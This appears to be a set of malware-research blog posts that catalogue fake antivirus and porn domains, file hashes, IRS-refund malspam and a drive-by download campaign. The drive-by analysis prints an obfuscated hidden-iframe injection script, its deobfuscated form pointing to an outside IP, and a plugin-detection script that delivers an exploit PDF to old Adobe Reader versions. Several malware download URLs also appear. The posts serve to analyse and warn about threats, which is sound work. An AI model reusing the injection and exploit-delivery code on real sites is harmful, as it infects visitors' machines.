Whois entry for hidef-porn-movies.com 91.212.132.11
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

antispyware-for-all.com
antispyware-systems.com
free-antiviruses.com
free-tube-video-central.net
hidef-porn-movies.com
porn-tube-host.com
virus-analysis.com
xhost-xtubes.com
xmovies-host.com
xtubes-hot-porn.com
xtubes-online.com
xxx-movies-central.com
youporn-online.com

/promo1/ – Fake Adult-Archive.net page
/promo2/ – Fake PornTube page
/promo3/ – Fake scan page
/promo4/ – Fake SexTube page

Whois entry for y0utybe.com 216.195.60.231
Whois Privacy Protection Service
Whois Agent suqkgszqlv@whoisservices.cn
+86.05922577888 fax: +86.05922577111
Xiamen Software Park shengshi Building
xiamen fujian 361005
china

softname.exe
Result: 16/40 (40%)
MD5: aa33e33a6d0a650958c3fa0d1333d9f3
VirusTotal
ThreatExpert Analysis
hxxp://hidef-porn-movies.com/promo2/get.php?aid=1226&vname=softname

Example screenshot.

STAY AWAY from these because in reality they are being used to collect email addresses likely for future SPAM campaigns.  I also suspect these domains are part of a current fake XP activation SPAM campaign.

Domains involved:

antivirus–activation–code1.org
antivirus–activation-code2.org
antivirus-activation–code1.org
antivirus-activation-code1.org
antivirus-activation-code2.org
antivirus-activation–code.info
antivirus–activation–code.info
new-activation-code.info
new–activation-code.info
online-activation-code.info
online–activation-code.info
online-activation–code.info
online–activation–code.info
pdf-activation-code.info
pdf–activation-code.info
pdf-activation–code.info

IPs associated with these:
66.79.162.82
67.209.140.130

antivirus-activation–code2.org
91.199.50.101

BE ADVISED: These sites may still be active, be careful!

–mwdisector

Site: hxxp://spamnuker.com/

File: OutlookSpamNukerInstaller.exe
VirusTotal: Result 14/36 (38.89%)

File size: 29280 bytes
MD5…: 463de2ba97b8effef4b72430de51553b
SHA1..: 1eb9f02c925ef27c5e6a1086cb0c6c798c208eaf
SHA256: 7700a3c6a95ed1bb2dfb21567818c7bce55a5d178b28cc9040c528d7045f72eb
SHA512: b52f87db3390ecd2cd5726c3833c07a224d9c718cc8d4a421faef5f66d3f3a26
25d1a92c7bf288f67e4fba9f1fd63c40fd05b76ea85b149d6019a6a17e428bce
PEiD..: -
TrID..: File type identification
Windows Screen Saver (39.4%)
Win32 Executable Generic (25.6%)
Win32 Dynamic Link Library (generic) (22.8%)
Generic Win/DOS Executable (6.0%)
DOS Executable Generic (6.0%)

Site:

* hxxp://viruslabs2009.com/

File: virlab_install.exe
VirusTotal: Result: 9/36 (25%)
File size: 1579973 bytes
MD5…: 93fef280425ad6fb002430abb8cf216d
SHA1..: 766a414faa1e062c0ce40f1ede93a3d166902b6c
SHA256: 4346309f29aacf14cd0fc764ccac674572a498b7f80e1a4018265008cbf1ba4c
SHA512: 371d231b30c32756be1dbd5b50e26144d506abe895a6893fdcea866b8353e310
8548ded05366e25c2d968dffa506880e8729b7b8a6b4f4e06c3814d903eba37e
PEiD..: -
TrID..: File type identification
Win64 Executable Generic (59.6%)
Win32 Executable MS Visual C++ (generic) (26.2%)
Win32 Executable Generic (5.9%)
Win32 Dynamic Link Library (generic) (5.2%)
Generic Win/DOS Executable (1.3%)

MDB: /stingner-malware/

Removal:

Remove this threat with MalwareBytes!

Here is a piece of malspam we received that poses to be from the IRS telling you that you are due for a refund. The one we got was from taxinform32@taxreducers.com. Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)

Get Your Refund $1927.10 in Just 3 Easy Steps:
1. Print and fill a short tax interview (click to download)
2. Send it online
3. Receive your tax refund

The link included takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr

taxform_for_print.scr
Result: 7/36 (19.45%)
MD5: a705a1df1fc36f696f0eb0fea72870d3
VirusTotal
ThreatExpert Analysis

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included

<script language=”javascript”>document.write(unescape(‘%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>

when deobfuscated…

<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(‘<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

hxxp://zz.gd/1d7d6a
-> hxxp://sghghdfgh.actionpooses.com/dfhgfhgfh
–> hxxp://actionpooses.com/livenow/live-now.htm
—> hxxp://212.179.35.9/Free-Girls-Cams-Viewer.exe

Free-Girls-Cams-Viewer.exe
Result: 6/36 (16.67%)
MD5: 716adbf47c6fffbd77604be9e9dd7043
VirusTotal
ThreatExpert Analysis

Warning: The BSD daemon may not appear in the malspam you receive. You have been forewarned.

The content of the e-mail purports to link to a number of “breaking” news items and “shocking” videos:

The infected sites look rather plain (no images from real news sites) with another false video embed and “ActiveX Object Error”:

Funny enough, clicking on the “Close this page” button at the top attempts to redirect to hxxp://79.135.167.18/antivirus, but due to a bit of a coding error on the behalf of the bad guys/gals, it looks like they only appended that URL to the existing one, e.g. hxxp://[infected site]/URL=hxxp://79.135.167.18/antivirus…yielding a 404:

Now, when attempting to navigate away from the page (or reload, too, of course), the user is presented with another warning dialog, stating that they haven’t finished their virus scan! GASP!

The dropper looks to be very similar to the ones we’ve already seen in the fake CNN and MSNBC campaigns, so nothing terribly new here. Two different filenames, scaner.exe [sic] and install.exe. Same tactic to get the user to download the dropper, too (simply direct them to it). Judging by what we’ve seen so far, this one’s going to download “Antivirus XP 2008″ again, so nothing new there, either.

SHA256(install.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca
SHA256(scaner.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca

I believe the attack is exploited 100% through hacked/infected computers. We know that the e-mails are being distributed by infected computers as we can tell from the e-mail headers, most of the e-mails come from private ADSL or cable lines. One question remains… how are the websites getting owned? Take a second to consider the following possibility…

I own domain.com and I don’t know a whole lot about HTML. I want a flashy website so I go out and buy “Build Your Own Website Software 1.0″. This type of software has several useful features such as a WYSIWYG editor, scripts, images, templates, and automatic FTP upload features.

If my machine is infected with malware it will most definitely search for FTP credentials. If the hackers spent a long enough time harvesting the FTP credentials all they needed to do is write software to upload their malicious pages to each site and then direct their botnet to start spamming the links at the same time.

Let’s look at one of the e-mails we received:
Header:

Received: from *.adsl.alicedsl.de (*.adsl.alicedsl.de [78.4*.15*.28*])

This header shows us that the mail was sent from a private ADSL line on the de TLD.

Body:

Girl trains monkey to give tongue service video hxxp://download.german-railroads.eu/start.html

The body of the e-mail contains a link to a German railroads site. Is this a coincidence?

I feel that my hypothesis is fairly obvious but I have not seen much speculation about the attack vector and I would like some input from our readers. What do you think?

If anyone reading this post has had their website compromised by this attack, please contact me at lithium@malwaredatabase.net as I would like to perform a post-mortem analysis to identify the attack vector.